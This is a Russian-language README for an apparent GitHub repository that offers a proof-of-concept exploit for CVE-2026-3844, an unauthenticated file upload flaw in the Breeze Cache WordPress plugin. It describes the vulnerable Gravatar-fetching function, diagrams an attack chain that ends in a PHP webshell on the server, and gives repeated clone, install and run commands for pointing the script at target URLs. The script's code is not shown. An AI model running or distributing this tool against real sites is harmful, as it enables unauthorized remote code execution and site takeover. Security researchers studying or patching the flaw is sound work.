
Эксплойт PoC для CVE-2026-3844 — критическая уязвимость неаутентифицированной загрузки файлов в плагине Breeze для WordPress, приводящая к RCE.
PoC-эксплойт для CVE-2026-3844 — критической уязвимости неаутентифицированной загрузки файлов в плагине Breeze для WordPress, приводящей к RCE.
CVE-2026-3844 — КРИТИЧЕСКАЯ уязвимость неаутентифицированной произвольной загрузки файлов в плагине Breeze Cache для WordPress (от Cloudways), затрагивающая все версии до 2.4.4 включительно.
Этот репозиторий содержит эксплойт Proof of Concept (PoC) (CVE-2026-3844.py) для авторизованного исследования безопасности, пентеста и ответственного раскрытия.
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| Поле | Сведения |
|---|---|
| CVE ID | CVE-2026-3844 |
| Плагин | Breeze Cache (от Cloudways) |
| Затронутые версии | Все версии ≤ 2.4.4 |
| Исправленная версия | Breeze 2.4.5+ |
| Тип уязвимости | CWE-434 — Неограниченная загрузка файлов опасного типа |
| Оценка CVSS v3.1 | 9.8 (КРИТИЧЕСКАЯ) |
| Оценка CVSS v2.0 | 10.0 (КРИТИЧЕСКАЯ) |
| Вектор CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Вектор атаки | Сеть (удалённо) |
| Требуется аутентификация | ❌ Нет — без аутентификации |
| Условие | Должна быть включена опция «Host Files Locally – Gravatars» (отключена по умолчанию) |
| Воздействие | Конфиденциальность: ВЫСОКАЯ · Целостность: ВЫСОКАЯ · Доступность: ВЫСОКАЯ |
| Опубликовано | 2026-04-23 |
| Источник | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
Плагин Breeze Cache для WordPress загружает удалённые изображения Gravatar и сохраняет их локально, когда включена функция «Host Files Locally – Gravatars». Уязвимая функция fetch_gravatar_from_remote в class-breeze-cache-cronjobs.php (строки 89–119) не выполняет проверку типа файла или расширения для загружаемого удалённого содержимого.
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
При успешной эксплуатации атакующий может:
requests# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v